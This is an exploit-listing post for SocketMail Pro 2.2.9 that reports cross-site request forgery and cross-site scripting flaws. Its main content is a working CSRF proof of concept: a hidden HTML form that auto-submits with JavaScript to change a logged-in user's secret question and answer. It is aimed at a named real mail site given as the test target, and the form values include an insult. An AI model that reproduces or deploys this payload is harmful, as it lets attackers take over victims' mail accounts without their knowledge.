Home / exploits SocketMail Pro 2.2.9 Cross Site Request Forgery / Cross Site
Posted on 23 April 2012
#Title:SocketMail Pro version 2.2.9 CSRF (Cross Site Request Forgery) && XSS (Cross Site Scripting) #Author:MetaiZm #Software:SocketMail Pro version 2.2.9 #Website:http://socketmail.com/ #Tested on:Windows XP SP3 # Description : Subject xss codes inject and email send -> Screen : http://s019.radikal.ru/i627/1204/e2/0ce8a6b54b52.jpg (XSS) # Author:B0T_25 Cross Site Request Forgery Change to Secret question <- # PoC: http://pastebin.com/diSCcMXM (CSRF) <form action="http://mail.hayastan.am/home/secretqtn.php" method=post name="signup"> <input type=hidden name='action' value='upd'> <input type=text name="user_secret_qtn" size="30" maxlength="50" value="hayastan?"> <input type=text name="user_secret_answer" size="30" maxlength="50" value="sikdimseni"> <input type="submit" value="gonder"/> </form> <script language="javascript"> document.forms[0].submit() </script> Dipnot: böyrÉ™y sözüm yoxdur! ^_^ Test site:mail.hayastan.am
